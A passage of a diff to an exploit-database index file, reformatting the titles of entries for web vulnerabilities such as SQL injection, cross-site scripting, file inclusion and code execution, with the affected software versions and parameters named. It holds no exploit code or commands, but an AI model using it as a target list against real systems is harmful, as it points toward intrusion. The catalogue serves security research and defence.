'/Interface/patient_file/encounter/load_form.php?formname' Traversal Local File Inclusion",2012-02-01,"High-Tech Bridge SA",php,webapps,0 36650,platforms/php/webapps/36650.txt,"OpenEMR 4.1 - '/contrib/acog/print_form.php?formname' Traversal Local File Inclusion",2012-02-01,"High-Tech Bridge SA",php,webapps,0 -36651,platforms/php/webapps/36651.txt,"OpenEMR 4.1 - '/Interface/fax/fax_dispatch.php' File Parameter 'exec()' Call Arbitrary Shell Command Execution",2012-02-01,"High-Tech Bridge SA",php,webapps,0 +36651,platforms/php/webapps/36651.txt,"OpenEMR 4.1 - '/Interface/fax/fax_dispatch.php?File' 'exec()' Call Arbitrary Shell Command Execution",2012-02-01,"High-Tech Bridge SA",php,webapps,0 36654,platforms/php/webapps/36654.txt,"phpLDAPadmin 1.2.2 - 'base' Cross-Site Scripting",2012-02-01,andsarmiento,php,webapps,0 36655,platforms/php/webapps/36655.txt,"phpLDAPadmin 1.2.0.5-2 - 'server_id' Cross-Site Scripting",2012-02-01,andsarmiento,php,webapps,0 36656,platforms/php/webapps/36656.txt,"GForge 5.7.1 - Multiple Cross-Site Scripting Vulnerabilities",2012-02-02,sonyy,php,webapps,0 @@ -35718,10 +35719,10 @@ id,file,description,date,author,platform,type,port 36754,platforms/php/webapps/36754.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_stat_uaddr.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36751,platforms/php/webapps/36751.txt,"WordPress Plugin Video Gallery 2.8 - SQL Injection",2015-04-14,"Claudio Viviani",php,webapps,80 36755,platforms/php/webapps/36755.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_user.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36757,platforms/php/webapps/36757.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'index.php' base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36757,platforms/php/webapps/36757.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'index.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36758,platforms/php/webapps/36758.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - '/admin/base_useradmin.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36759,platforms/php/webapps/36759.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - '/admin/index.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36760,platforms/php/webapps/36760.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_ag_main.php Crafted Arbitrary File Upload / Arbitrary Code Execution",2012-02-11,indoushka,php,webapps,0 +36760,platforms/php/webapps/36760.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_ag_main.php' Crafted Arbitrary File Upload / Arbitrary Code Execution",2012-02-11,indoushka,php,webapps,0 36762,platforms/php/webapps/36762.txt,"WordPress Plugin MiwoFTP 1.0.5 - Multiple Cross-Site Request Forgery / Cross-Site Scripting Vulnerabilities",2015-04-14,LiquidWorm,php,webapps,80 36763,platforms/php/webapps/36763.txt,"WordPress Plugin MiwoFTP 1.0.5 - Cross-Site Request Forgery / Arbitrary File Creation / Remote Code Execution",2015-04-14,LiquidWorm,php,webapps,80 36764,platforms/php/webapps/36764.txt,"SMW+ 1.5.6 - 'target' HTML Injection",2012-02-13,sonyy,php,webapps,0 @@ -35775,7 +35776,7 @@ id,file,description,date,author,platform,type,port 36861,platforms/windows/webapps/36861.txt,"Wing FTP Server Admin 4.4.5 - Multiple Vulnerabilities",2015-04-29,hyp3rlinx,windows,webapps,5466 36862,platforms/php/webapps/36862.txt,"OS Solution OSProperty 2.8.0 - SQL Injection",2015-04-29,"Brandon Perry",php,webapps,80 36863,platforms/php/webapps/36863.txt,"Joomla! Component Machine - Multiple SQL Injections",2012-02-20,the_cyber_nuxbie,php,webapps,0 -36865,platforms/hardware/webapps/36865.txt,"Xavi 7968 ADSL Router - webconfig/lan/lan_config.html/local_lan_config host_name_txtbox Parameter Cross-Site Scripting",2012-02-21,Busindre,hardware,webapps,0 +36865,platforms/hardware/webapps/36865.txt,"Xavi 7968 ADSL Router - '/webconfig/lan/lan_config.html/local_lan_config?host_name_txtbox' Cross-Site Scripting",2012-02-21,Busindre,hardware,webapps,0 36867,platforms/php/webapps/36867.txt,"CPG Dragonfly CMS 9.3.3.0 - Multiple Multiple Cross-Site Scripting Vulnerabilities",2012-02-21,Ariko-Security,php,webapps,0 36870,platforms/php/webapps/36870.txt,"ContentLion Alpha 1.3 - 'login.php' Cross-Site Scripting",2012-02-22,"Stefan Schurtz",php,webapps,0 36873,platforms/php/webapps/36873.txt,"Dolibarr CMS 3.2 Alpha - Multiple Directory Traversal Vulnerabilities",2012-02-22,"Benjamin Kunz Mejri",php,webapps,0 @@ -35792,8 +35793,8 @@ id,file,description,date,author,platform,type,port 36890,platforms/php/webapps/36890.txt,"Dotclear 2.4.1.2 - '/admin/comments.php' Multiple Cross-Site Scripting Vulnerabilities",2012-02-29,"High-Tech Bridge SA",php,webapps,0 36891,platforms/php/webapps/36891.txt,"Dotclear 2.4.1.2 - '/admin/plugin.php?page' Cross-Site Scripting",2012-02-29,"High-Tech Bridge SA",php,webapps,0 36892,platforms/php/webapps/36892.html,"Traidnt Topics Viewer 2.0 - 'main.php' Cross-Site Request Forgery",2012-02-29,"Green Hornet",php,webapps,0 -36893,platforms/php/webapps/36893.txt,"Fork CMS 3.x - private/en/locale/index name Parameter Cross-Site Scripting",2012-02-28,anonymous,php,webapps,0 -36894,platforms/php/webapps/36894.txt,"Fork CMS 3.x - '/backend/modules/error/actions/index.php parse()' Multiple Error Display Cross-Site Scripting Vulnerabilities",2012-02-28,anonymous,php,webapps,0 +36893,platforms/php/webapps/36893.txt,"Fork CMS 3.x - '/private/en/locale/index?name' Cross-Site Scripting",2012-02-28,anonymous,php,webapps,0 +36894,platforms/php/webapps/36894.txt,"Fork CMS 3.x - '/backend/modules/error/actions/index.php?parse()' Multiple Error Display Cross-Site Scripting Vulnerabilities",2012-02-28,anonymous,php,webapps,0 36895,platforms/php/webapps/36895.txt,"starCMS - 'q' URI Cross-Site Scripting",2012-03-02,Am!r,php,webapps,0 36897,platforms/php/webapps/36897.txt,"LastGuru ASP Guestbook - 'View.asp' SQL Injection",2012-03-04,demonalex,php,webapps,0 36898,platforms/php/webapps/36898.txt,"Etano 1.20/1.22 - 'search.php' Multiple Cross-Site Scripting Vulnerabilities",2012-03-05,"Aung Khant",php,webapps,0 @@ -35824,7 +35825,7 @@ id,file,description,date,author,platform,type,port 36934,platforms/asp/webapps/36934.txt,"SAP Business Objects InfoVew System - 'listing.aspx?searchText' Cross-Site Scripting",2012-03-08,vulns@dionach.com,asp,webapps,0 36935,platforms/asp/webapps/36935.txt,"SAP Business Objects InfoView System - '/help/helpredir.aspx?guide' Cross-Site Scripting",2012-03-08,vulns@dionach.com,asp,webapps,0 36936,platforms/asp/webapps/36936.txt,"SAP Business Objects InfoView System - '/webi/webi_modify.aspx?id' Cross-Site Scripting",2012-03-08,vulns@dionach.com,asp,webapps,0 -36937,platforms/php/webapps/36937.html,"PHPMyVisites 2.4 - PHPmv2/index.php Multiple Cross-Site Scripting Vulnerabilities",2012-03-09,AkaStep,php,webapps,0 +36937,platforms/php/webapps/36937.html,"PHPMyVisites 2.4 - 'PHPmv2/index.php' Multiple Cross-Site Scripting Vulnerabilities",2012-03-09,AkaStep,php,webapps,0 36938,platforms/php/webapps/36938.txt,"Singapore 0.10.1 - 'gallery' Cross-Site Scripting",2012-03-11,T0xic,php,webapps,0 36939,platforms/java/webapps/36939.txt,"EJBCA 4.0.7 - 'issuer' Cross-Site Scripting",2012-03-11,MustLive,java,webapps,0 36940,platforms/cgi/webapps/36940.txt,"Dell SonicWALL Secure Remote Access (SRA) Appliance - Cross-Site Request Forgery",2015-05-07,"Veit Hailperin",cgi,webapps,443 @@ -35855,16 +35856,16 @@ id,file,description,date,author,platform,type,port 37186,platforms/php/webapps/37186.txt,"VFront 0.99.2 - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2015-06-03,hyp3rlinx,php,webapps,0 37006,platforms/java/webapps/37006.txt,"Minify 2.1.x - 'g' Cross-Site Scripting",2012-03-21,"Ayoub Aboukir",java,webapps,0 36986,platforms/php/webapps/36986.txt,"Pluck CMS 4.7 - Directory Traversal",2015-05-11,Wadeek,php,webapps,0 -36987,platforms/hardware/webapps/36987.pl,"D-Link DSL-500B Gen 2 - (Parental Control Configuration Panel) Persistent Cross-Site Scripting",2015-05-11,"XLabs Security",hardware,webapps,0 -36988,platforms/hardware/webapps/36988.pl,"D-Link DSL-500B Gen 2 - (URL Filter Configuration Panel) Persistent Cross-Site Scripting",2015-05-11,"XLabs Security",hardware,webapps,0 +36987,platforms/hardware/webapps/36987.pl,"D-Link DSL-500B Gen 2 - Parental Control Configuration Panel Persistent Cross-Site Scripting",2015-05-11,"XLabs Security",hardware,webapps,0 +36988,platforms/hardware/webapps/36988.pl,"D-Link DSL-500B Gen 2 - URL Filter Configuration Panel Persistent Cross-Site Scripting",2015-05-11,"XLabs Security",hardware,webapps,0 36989,platforms/php/webapps/36989.txt,"eFront 3.6.15 - Multiple SQL Injections",2015-05-11,"Filippo Roncari",php,webapps,0 36990,platforms/php/webapps/36990.txt,"eFront 3.6.15 - Directory Traversal",2015-05-11,"Filippo Roncari",php,webapps,0 36991,platforms/php/webapps/36991.txt,"eFront 3.6.15 - PHP Object Injection",2015-05-11,"Filippo Roncari",php,webapps,0 36992,platforms/php/webapps/36992.txt,"Wing FTP Server Admin 4.4.5 - Cross-Site Request Forgery (Add User)",2015-05-11,hyp3rlinx,php,webapps,0 36993,platforms/php/webapps/36993.txt,"SQLBuddy 1.3.3 - Directory Traversal",2015-05-11,hyp3rlinx,php,webapps,0 36997,platforms/php/webapps/36997.txt,"CMSimple 3.3 - 'index.php' Cross-Site Scripting",2012-03-21,"Stefan Schurtz",php,webapps,0 -36999,platforms/php/webapps/36999.txt,"Open Journal Systems (OJS) 2.3.6 - 'index.php' authors[][url] Parameter Cross-Site Scripting",2012-03-21,"High-Tech Bridge",php,webapps,0 -37000,platforms/php/webapps/37000.txt,"Open Journal Systems (OJS) 2.3.6 - '/lib/pkp/classes/core/String.inc.php String::stripUnsafeHtml()' Method Cross-Site Scripting",2012-03-21,"High-Tech Bridge",php,webapps,0 +36999,platforms/php/webapps/36999.txt,"Open Journal Systems (OJS) 2.3.6 - 'index.php?authors[][url]' Cross-Site Scripting",2012-03-21,"High-Tech Bridge",php,webapps,0 +37000,platforms/php/webapps/37000.txt,"Open Journal Systems (OJS) 2.3.6 - '/lib/pkp/classes/core/String.inc.php?String::stripUnsafeHtml()' Method Cross-Site Scripting",2012-03-21,"High-Tech Bridge",php,webapps,0 37001,platforms/php/webapps/37001.txt,"Open Journal Systems (OJS) 2.3.6 - Multiple Script Arbitrary File Upload",2012-03-21,"High-Tech Bridge",php,webapps,0 37002,platforms/php/webapps/37002.txt,"Open Journal Systems (OJS) 2.3.6 - 'rfiles.php' Traversal Arbitrary File Manipulation",2012-03-21,"High-Tech Bridge",php,webapps,0 37003,platforms/php/webapps/37003.txt,"WordPress Plugin Booking Calendar Contact Form 1.0.2 - Multiple Vulnerabilities",2015-05-13,"i0akiN SEC-LABORATORY",php,webapps,0 @@ -35874,12 +35875,12 @@ id,file,description,date,author,platform,type,port 37010,platforms/php/webapps/37010.txt,"Zumset.com FbiLike 1.00 - 'id' Cross-Site Scripting",2012-03-25,Crim3R,php,webapps,0 37011,platforms/php/webapps/37011.txt,"Geeklog 1.8.1 - 'index.php' SQL Injection",2012-03-27,HELLBOY,php,webapps,0 37012,platforms/php/webapps/37012.txt,"NextBBS 0.6 - 'ajaxserver.php' Multiple SQL Injections",2012-03-27,waraxe,php,webapps,0 -37013,platforms/php/webapps/37013.txt,"NextBBS 0.6 - 'index.php' do Parameter Cross-Site Scripting",2012-03-27,waraxe,php,webapps,0 +37013,platforms/php/webapps/37013.txt,"NextBBS 0.6 - 'index.php?do' Cross-Site Scripting",2012-03-27,waraxe,php,webapps,0 37015,platforms/asp/webapps/37015.txt,"Matthew1471 BlogX - Multiple Cross-Site Scripting Vulnerabilities",2012-03-27,demonalex,asp,webapps,0 37016,platforms/php/webapps/37016.txt,"WordPress Plugin Integrator 1.32 - 'redirect_to' Cross-Site Scripting",2012-03-28,"Stefan Schurtz",php,webapps,0 37017,platforms/php/webapps/37017.txt,"Invision Power Board 4.2.1 - 'searchText' Cross-Site Scripting",2012-03-28,sonyy,php,webapps,0 -37018,platforms/php/webapps/37018.txt,"MyBB 1.6.6 - 'index.php' conditions[usergroup][] Parameter SQL Injection",2013-03-27,"Aditya Modha",php,webapps,0 -37019,platforms/php/webapps/37019.txt,"MyBB 1.6.6 - 'index.php' conditions[usergroup][] Parameter Cross-Site Scripting",2013-03-27,"Aditya Modha",php,webapps,0 +37018,platforms/php/webapps/37018.txt,"MyBB 1.6.6 - 'index.php?conditions[usergroup][]' SQL Injection",2013-03-27,"Aditya Modha",php,webapps,0 +37019,platforms/php/webapps/37019.txt,"MyBB 1.6.6 - 'index.php?conditions[usergroup][]' Cross-Site Scripting",2013-03-27,"Aditya Modha",php,webapps,0 37021,platforms/php/webapps/37021.txt,"TomatoCart 1.2.0 Alpha 2 - 'json.php' Local File Inclusion",2012-03-28,"Canberk BOLAT",php,webapps,0 37022,platforms/php/webapps/37022.txt,"ocPortal 7.1.5 - 'code_editor.php' Multiple Cross-Site Scripting Vulnerabilities",2012-03-28,"High-Tech Bridge",php,webapps,0 37023,platforms/php/webapps/37023.txt,"EasyPHP - 'main.php' SQL Injection",2012-03-29,"Skote Vahshat",php,webapps,0 @@ -35889,9 +35890,9 @@ id,file,description,date,author,platform,type,port 37027,platforms/php/webapps/37027.txt,"Simple Machines Forum (SMF) 2.0.2 - 'scheduled' Cross-Site Scripting",2012-03-29,Am!r,php,webapps,0 37028,platforms/php/webapps/37028.txt,"JamWiki 1.1.5 - 'num' Cross-Site Scripting",2012-03-30,"Sooraj K.S",php,webapps,0 37029,platforms/java/webapps/37029.txt,"ManageEngine Firewall Analyzer 7.2 - '/fw/index2.do' Multiple Cross-Site Scripting Vulnerabilities",2012-04-01,"Vulnerability Research Laboratory",java,webapps,0 -37030,platforms/java/webapps/37030.txt,"ManageEngine Firewall Analyzer 7.2 - fw/createAnomaly.do subTab Parameter Cross-Site Scripting",2012-04-01,"Vulnerability Research Laboratory",java,webapps,0 -37031,platforms/java/webapps/37031.txt,"ManageEngine Firewall Analyzer 7.2 - fw/mindex.do url Parameter Cross-Site Scripting",2012-04-01,"Vulnerability Research Laboratory",java,webapps,0 -37032,platforms/java/webapps/37032.txt,"ManageEngine Firewall Analyzer 7.2 - fw/syslogViewer.do port Parameter Cross-Site Scripting",2012-04-01,"Vulnerability Research Laboratory",java,webapps,0 +37030,platforms/java/webapps/37030.txt,"ManageEngine Firewall Analyzer 7.2 - 'fw/createAnomaly.do?subTab' Cross-Site Scripting",2012-04-01,"Vulnerability Research Laboratory",java,webapps,0 +37031,platforms/java/webapps/37031.txt,"ManageEngine Firewall Analyzer 7.2 - 'fw/mindex.do?url' Cross-Site Scripting",2012-04-01,"Vulnerability Research Laboratory",java,webapps,0 +37032,platforms/java/webapps/37032.txt,"ManageEngine Firewall Analyzer 7.2 - 'fw/syslogViewer.do?port' Cross-Site Scripting",2012-04-01,"Vulnerability Research Laboratory",java,webapps,0 37033,platforms/java/webapps/37033.txt,"JBMC Software DirectAdmin 1.403 - 'domain' Cross-Site Scripting",2012-04-02,"Dawid Golak",java,webapps,0 37034,platforms/php/webapps/37034.txt,"FlatnuX CMS - Traversal Arbitrary File Access",2012-04-01,"Vulnerability Laboratory",php,webapps,0 37035,platforms/php/webapps/37035.html,"FlatnuX CMS - Cross-Site Request Forgery (Add Admin)",2012-04-01,"Vulnerability Laboratory",php,webapps,0 @@ -35937,7 +35938,7 @@ id,file,description,date,author,platform,type,port 37091,platforms/php/webapps/37091.txt,"Acuity CMS 2.6.2 - 'Username' Cross-Site Scripting",2012-04-17,"Aung Khant",php,webapps,0 37092,platforms/php/webapps/37092.txt,"XOOPS 2.5.4 - '/modules/pm/pmlite.php?to_userid' Cross-Site Scripting",2012-04-18,"High-Tech Bridge SA",php,webapps,0 37093,platforms/php/webapps/37093.txt,"XOOPS 2.5.4 - '/tiny_mce/plugins/xoopsimagemanager/xoopsimagebrowser.php' Multiple Cross-Site Scripting Vulnerabilities",2012-04-18,"High-Tech Bridge SA",php,webapps,0 -37094,platforms/php/webapps/37094.txt,"ownCloud 3.0.0 - 'index.php' redirect_url Parameter Arbitrary Site Redirect",2012-04-18,"Tobias Glemser",php,webapps,0 +37094,platforms/php/webapps/37094.txt,"ownCloud 3.0.0 - 'index.php?redirect_url' Arbitrary Site Redirect",2012-04-18,"Tobias Glemser",php,webapps,0 37095,platforms/php/webapps/37095.txt,"Pendulab ChatBlazer 8.5 - 'Username' Cross-Site Scripting",2012-04-20,sonyy,php,webapps,0 37096,platforms/php/webapps/37096.html,"Anchor CMS 0.6-14-ga85d0a0 - 'id' Multiple HTML Injection Vulnerabilities",2012-04-20,"Gjoko Krstic",php,webapps,0 37253,platforms/php/webapps/37253.txt,"WordPress Plugin Paypal Currency Converter Basic For WooCommerce - File Read",2015-06-10,Kuroi'SH,php,webapps,0 @@ -35959,7 +35960,7 @@ id,file,description,date,author,platform,type,port 37113,platforms/php/webapps/37113.txt,"WordPress Plugin Simple Photo Gallery 1.7.8 - Blind SQL Injection",2015-05-26,woodspeed,php,webapps,80 37114,platforms/jsp/webapps/37114.txt,"Sendio ESP - Information Disclosure",2015-05-26,"Core Security",jsp,webapps,80 37115,platforms/perl/webapps/37115.txt,"ClickHeat 1.13+ - Remote Command Execution",2015-05-26,"Calum Hutton",perl,webapps,0 -37116,platforms/php/webapps/37116.py,"Silverstripe CMS 2.4.7 - install.php PHP Code Injection",2012-04-27,"Mehmet Ince",php,webapps,0 +37116,platforms/php/webapps/37116.py,"Silverstripe CMS 2.4.7 - 'install.php' PHP Code Injection",2012-04-27,"Mehmet Ince",php,webapps,0 37117,platforms/perl/webapps/37117.txt,"Croogo CMS 1.3.4 - Multiple HTML Injection Vulnerabilities",2012-04-29,"Chokri Ben Achor",perl,webapps,0 37118,platforms/php/webapps/37118.txt,"SKYUC 3.2.1 - 'encode' Cross-Site Scripting",2012-04-27,farbodmahini,php,webapps,0 37119,platforms/asp/webapps/37119.txt,"XM Forum - 'id' Multiple SQL Injections",2012-04-27,"Farbod Mahini",asp,webapps,0 @@ -35975,7 +35976,7 @@ id,file,description,date,author,platform,type,port 37130,platforms/php/webapps/37130.txt,"MySQLDumper 1.24.4 - Multiple Script Direct Request Information Disclosures",2012-04-27,AkaStep,php,webapps,0 37131,platforms/php/webapps/37131.txt,"MySQLDumper 1.24.4 - 'main.php' Multiple Cross-Site Request Forgery Vulnerabilities",2012-04-27,AkaStep,php,webapps,0 37132,platforms/php/webapps/37132.txt,"WordPress Plugin Free Counter 1.1 - Persistent Cross-Site Scripting",2015-05-27,"Panagiotis Vagenas",php,webapps,80 -37133,platforms/php/webapps/37133.txt,"MySQLDumper 1.24.4 - 'index.php' page Parameter Cross-Site Scripting",2012-04-27,AkaStep,php,webapps,0 +37133,platforms/php/webapps/37133.txt,"MySQLDumper 1.24.4 - 'index.php?page' Cross-Site Scripting",2012-04-27,AkaStep,php,webapps,0 37134,platforms/php/webapps/37134.php,"MySQLDumper 1.24.4 - 'menu.php' PHP Remote Code Execution",2012-04-27,AkaStep,php,webapps,0 37135,platforms/hardware/webapps/37135.txt,"iGuard Security Access Control Device Firmware 3.6.7427A - Cross-Site Scripting",2012-05-02,"Usman Saeed",hardware,webapps,0 37136,platforms/php/webapps/37136.txt,"Trombinoscope 3.x - 'photo.php' Server SQL Injection",2012-05-07,"Ramdan Yantu",php,webapps,0 @@ -35986,7 +35987,7 @@ id,file,description,date,author,platform,type,port 37142,platforms/php/webapps/37142.txt,"OrangeHRM 2.7 RC - '/plugins/ajaxCalls/haltResumeHsp.php?hspSummaryId' SQL Injection",2012-05-09,"High-Tech Bridge SA",php,webapps,0 37143,platforms/php/webapps/37143.txt,"OrangeHRM 2.7 RC - '/plugins/ajaxCalls/haltResumeHsp.php?newHspStatus' Cross-Site Scripting",2012-05-09,"High-Tech Bridge SA",php,webapps,0 37144,platforms/php/webapps/37144.txt,"OrangeHRM 2.7 RC - '/templates/hrfunct/emppop.php?sortOrder1' Cross-Site Scripting",2012-05-09,"High-Tech Bridge SA",php,webapps,0 -37145,platforms/php/webapps/37145.txt,"OrangeHRM 2.7 RC - 'index.php' URI Parameter Cross-Site Scripting",2012-05-09,"High-Tech Bridge SA",php,webapps,0 +37145,platforms/php/webapps/37145.txt,"OrangeHRM 2.7 RC - 'index.php?URI' Cross-Site Scripting",2012-05-09,"High-Tech Bridge SA",php,webapps,0 37146,platforms/php/webapps/37146.txt,"PivotX 2.3.2 - 'ajaxhelper.php' Cross-Site Scripting",2012-05-09,"High-Tech Bridge SA",php,webapps,0 37147,platforms/php/webapps/37147.txt,"Chevereto 1.91 - '/Upload/engine.php?v' Cross-Site Scripting",2012-05-10,AkaStep,php,webapps,0 37148,platforms/php/webapps/37148.txt,"Chevereto 1.91 - '/Upload/engine.php?v' Traversal Arbitrary File Enumeration",2012-05-10,AkaStep,php,webapps,0 @@ -36036,11 +36037,11 @@ id,file,description,date,author,platform,type,port 37224,platforms/php/webapps/37224.txt,"Yandex.Server 2010 9.0 - 'text' Cross-Site Scripting",2012-05-21,MustLive,php,webapps,0 37225,platforms/php/webapps/37225.pl,"Concrete CMS < 5.5.21 - Multiple Vulnerabilities",2012-05-20,AkaStep,php,webapps,0 37226,platforms/php/webapps/37226.txt,"Concrete5 FlashUploader - Arbitrary '.SWF' File Upload",2012-05-20,AkaStep,php,webapps,0 -37350,platforms/php/webapps/37350.txt,"AdaptCMS 2.0.2 TinyURL Plugin - 'index.php' id Parameter SQL Injection",2012-06-03,KedAns-Dz,php,webapps,0 +37350,platforms/php/webapps/37350.txt,"AdaptCMS 2.0.2 TinyURL Plugin - 'index.php?id' SQL Injection",2012-06-03,KedAns-Dz,php,webapps,0 37351,platforms/php/webapps/37351.txt,"AdaptCMS 2.0.2 TinyURL Plugin - 'admin.php' Multiple SQL Injections",2012-06-03,KedAns-Dz,php,webapps,0 37352,platforms/php/webapps/37352.txt,"Ignite Solutions CMS - 'car-details.php' SQL Injection",2012-06-03,Am!r,php,webapps,0 37353,platforms/php/webapps/37353.php,"WordPress Plugin Nmedia WordPress Member Conversation 1.35.0 - 'doupload.php' Arbitrary File Upload",2015-06-05,"Sammy FORGIT",php,webapps,0 -37248,platforms/php/webapps/37248.txt,"Milw0rm Clone Script 1.0 - (Time Based) SQL Injection",2015-06-09,Pancaker,php,webapps,0 +37248,platforms/php/webapps/37248.txt,"Milw0rm Clone Script 1.0 - Time Based SQL Injection",2015-06-09,Pancaker,php,webapps,0 37237,platforms/hardware/webapps/37237.txt,"D-Link DSL-2780B DLink_1.01.14 - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0 37238,platforms/hardware/webapps/37238.txt,"TP-Link TD-W8950ND ADSL2+ - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0 37240,platforms/hardware/webapps/37240.txt,"D-Link DSL-2730B AU_2.01 - Authentication Bypass DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0 @@ -36098,10 +36099,10 @@ id,file,description,date,author,platform,type,port 37356,platforms/php/webapps/37356.txt,"WordPress Plugin Email NewsLetter 8.0 - 'option' Information Disclosure",2012-06-07,"Sammy FORGIT",php,webapps,0 37357,platforms/php/webapps/37357.php,"WordPress Plugin VideoWhisper Video Presentation 3.17 - 'vw_upload.php' Arbitrary File Upload",2012-06-07,"Sammy FORGIT",php,webapps,0 37337,platforms/php/webapps/37337.txt,"WHMCompleteSolution (WHMCS) 5.0 - Cross-Site Request Forgery (Multiple Application Function)",2012-05-31,"Shadman Tanjim",php,webapps,0 -37338,platforms/php/webapps/37338.txt,"WHMCompleteSolution (WHMCS) 5.0 - 'KnowledgeBase.php' search Parameter Cross-Site Scripting",2012-05-31,"Shadman Tanjim",php,webapps,0 +37338,platforms/php/webapps/37338.txt,"WHMCompleteSolution (WHMCS) 5.0 - 'KnowledgeBase.php?search' Cross-Site Scripting",2012-05-31,"Shadman Tanjim",php,webapps,0 37339,platforms/php/webapps/37339.txt,"VoipNow Professional 2.5.3 - 'nsextt' Cross-Site Scripting",2012-06-01,Aboud-el,php,webapps,0 37340,platforms/php/webapps/37340.html,"TinyCMS 1.3 - Arbitrary File Upload / Cross-Site Request Forgery",2012-06-03,KedAns-Dz,php,webapps,0 -37341,platforms/php/webapps/37341.txt,"TinyCMS 1.3 - 'index.php' page Parameter Traversal Local File Inclusion",2012-06-03,KedAns-Dz,php,webapps,0 +37341,platforms/php/webapps/37341.txt,"TinyCMS 1.3 - 'index.php?page' Traversal Local File Inclusion",2012-06-03,KedAns-Dz,php,webapps,0 37342,platforms/php/webapps/37342.txt,"TinyCMS 1.3 - '/admin/admin.php?do' Traversal Local File Inclusion",2012-06-03,KedAns-Dz,php,webapps,0 37816,platforms/multiple/webapps/37816.txt,"Cisco Unified Communications Manager - Multiple Vulnerabilities",2015-08-18,"Bernhard Mueller",multiple,webapps,0 37815,platforms/php/webapps/37815.txt,"vBulletin < 4.2.2 - Memcache Remote Code Execution",2015-08-18,"Joshua Rogers",php,webapps,80 @@ -36286,7 +36287,7 @@ id,file,description,date,author,platform,type,port 37610,platforms/php/webapps/37610.txt,"sysPass 1.0.9 - SQL Injection",2015-07-14,"SySS GmbH",php,webapps,0 37613,platforms/php/webapps/37613.txt,"phpList 2.10.18 - 'index.php' SQL Injection",2012-08-08,"High-Tech Bridge SA",php,webapps,0 37614,platforms/php/webapps/37614.txt,"PBBoard - 'index.php' Multiple SQL Injections",2012-08-08,"High-Tech Bridge",php,webapps,0 -37615,platforms/php/webapps/37615.txt,"PBBoard - member_id Parameter Validation Password Manipulation",2012-08-08,"High-Tech Bridge",php,webapps,0 +37615,platforms/php/webapps/37615.txt,"PBBoard - 'member_id' Validation Password Manipulation",2012-08-08,"High-Tech Bridge",php,webapps,0 37616,platforms/php/webapps/37616.txt,"PBBoard - 'admin.php?xml_name' Arbitrary PHP Code Execution",2012-08-08,"High-Tech Bridge",php,webapps,0 37617,platforms/php/webapps/37617.txt,"dirLIST 0.3.0 - Local File Inclusion",2012-08-08,L0n3ly-H34rT,php,webapps,0 37620,platforms/php/webapps/37620.txt,"Joomla! Component com_docman - Multiple Vulnerabilities",2015-07-15,"Hugo Santiago",php,webapps,80 @@ -36450,7 +36451,7 @@ id,file,description,date,author,platform,type,port 37955,platforms/php/webapps/37955.html,"Pligg CMS 2.0.2 - Cross-Site Request Forgery (Add Admin)",2015-08-24,"Arash Khazaei",php,webapps,80 37956,platforms/php/webapps/37956.txt,"WordPress Theme GeoPlaces3 - Arbitrary File Upload",2015-08-24,Mdn_Newbie,php,webapps,80 37959,platforms/php/webapps/37959.txt,"BSW Gallery - 'uploadpic.php' Arbitrary File Upload",2012-10-18,cr4wl3r,php,webapps,0 -37960,platforms/php/webapps/37960.txt,"Amateur Photographer's Image Gallery - 'force-download.php' File Parameter Information Disclosure",2012-10-18,cr4wl3r,php,webapps,0 +37960,platforms/php/webapps/37960.txt,"Amateur Photographer's Image Gallery - 'force-download.php?File' Information Disclosure",2012-10-18,cr4wl3r,php,webapps,0 37961,platforms/php/webapps/37961.txt,"Amateur Photographer's Image Gallery - 'plist.php?albumid' SQL Injection",2012-10-18,cr4wl3r,php,webapps,0 37962,platforms/php/webapps/37962.txt,"Amateur Photographer's Image Gallery - 'plist.php?albumid' Cross-Site Scripting",2012-10-18,cr4wl3r,php,webapps,0 37963,platforms/php/webapps/37963.txt,"Amateur Photographer's Image Gallery - 'fullscreen.php?albumid' SQL Injection",2012-10-18,cr4wl3r,php,webapps,0 @@ -36483,7 +36484,7 @@ id,file,description,date,author,platform,type,port 38010,platforms/php/webapps/38010.txt,"VeriCentre - Multiple SQL Injections",2012-11-06,"Cory Eubanks",php,webapps,0 38011,platforms/php/webapps/38011.txt,"OrangeHRM - 'sortField' SQL Injection",2012-11-07,"High-Tech Bridge",php,webapps,0 38012,platforms/php/webapps/38012.txt,"WordPress Plugin FLV Player - 'id' SQL Injection",2012-11-07,"Ashiyane Digital Security Team",php,webapps,0 -38015,platforms/php/webapps/38015.txt,"AR Web Content Manager - (AWCM) cookie_gen.php Arbitrary Cookie Generation",2012-11-08,"Sooel Son",php,webapps,0 +38015,platforms/php/webapps/38015.txt,"AR Web Content Manager (AWCM) - 'cookie_gen.php' Arbitrary Cookie Generation",2012-11-08,"Sooel Son",php,webapps,0 38016,platforms/multiple/webapps/38016.txt,"ESRI ArcGIS for Server - 'where' Form Field SQL Injection",2012-11-09,anonymous,multiple,webapps,0 38017,platforms/php/webapps/38017.txt,"WordPress Theme Kakao - 'ID' SQL Injection",2012-11-09,sil3nt,php,webapps,0 38018,platforms/php/webapps/38018.txt,"WordPress Plugin PHP Event Calendar - 'cid' SQL Injection",2012-11-09,"Ashiyane Digital Security Team",php,webapps,0 @@ -36554,7 +36555,7 @@ id,file,description,date,author,platform,type,port 38135,platforms/php/webapps/38135.txt,"Joomla! Component com_bit - 'Controller' Local File Inclusion",2012-12-19,Xr0b0t,php,webapps,0 38139,platforms/php/webapps/38139.txt,"MyBB Transactions Plugin - 'transaction' SQL Injection",2012-12-18,limb0,php,webapps,0 38140,platforms/php/webapps/38140.php,"VoipNow Service Provider Edition - 